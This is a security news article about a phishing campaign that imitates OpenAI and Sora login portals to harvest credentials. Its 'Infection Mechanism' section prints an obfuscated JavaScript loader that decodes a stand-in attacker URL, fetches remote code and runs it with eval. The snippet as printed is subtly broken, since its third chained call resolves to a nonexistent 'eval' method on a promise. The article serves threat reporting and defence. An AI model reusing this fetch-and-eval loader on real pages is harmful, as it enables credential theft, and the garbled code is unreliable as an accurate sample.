Hackers Mimic as OpenAI and Sora Services to Steal Login Credentials

In recent weeks, a sophisticated phishing campaign has emerged, targeting corporate and consumer accounts by impersonating both OpenAI and Sora-branded login portals.

Attackers distribute emails crafted to appear as legitimate service notifications, warning recipients of account suspension or unusual activity.

These messages include links directing victims to counterfeit login pages that closely replicate the original sites’ layouts and SSL certificates.

Early reports surfaced after several organizations reported unauthorized access attempts shortly after employees clicked through these phishing lures.

Unit 42 researchers identified that the threat actors behind this campaign employ a multi-stage loader written in obfuscated JavaScript, dynamically injecting malicious payloads into victim browsers once credentials are submitted.

The injected code then exfiltrates harvested usernames and passwords to a command-and-control (C2) server before redirecting users to the legitimate service, effectively masking the breach and reducing suspicion.

This stealthy approach allows the attackers to remain undetected while gathering large volumes of credentials from both enterprise and personal accounts.

The impact of this malware is significant: compromised credentials can be used to access sensitive data, manipulate AI models, or launch further attacks under the guise of trusted services.

Organizations relying on Single Sign-On (SSO) solutions are particularly vulnerable, as stolen tokens may grant lateral movement within corporate networks.

Security teams are advised to review recent login activity, implement multi-factor authentication (MFA), and monitor outbound traffic for connections to known malicious domains.

Infection Mechanism

Central to this campaign is the JavaScript loader, which executes immediately after the victim submits credentials on the fraudulent page.

The loader’s code is heavily obfuscated using custom string-encoding routines. A simplified excerpt of the loader is shown below:-

(function(){
  const _0x3a5f=['fetch','then','text','eval'];  
  fetch(atob('aHR0cHM6Ly9tYWxpY2lvdXMuZXhhbXBsZS5jb20vZ2V0PWFqYXg='))  
    [_0x3a5f[1]](res=>res[_0x3a5f[2]]())  
    [_0x3a5f[3]](payload=>eval(payload));  
})();

Once decoded, this snippet reaches out to the C2 endpoint, retrieves a more complex payload, and executes it in the victim’s browser context.

This dynamic loading strategy makes signature-based detection challenging, as the actual malicious code is never present in the initial page.

Persistence is achieved by leveraging browser local storage and session restoration scripts, ensuring the loader reactivates even if the user clears cookies or closes the tab.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.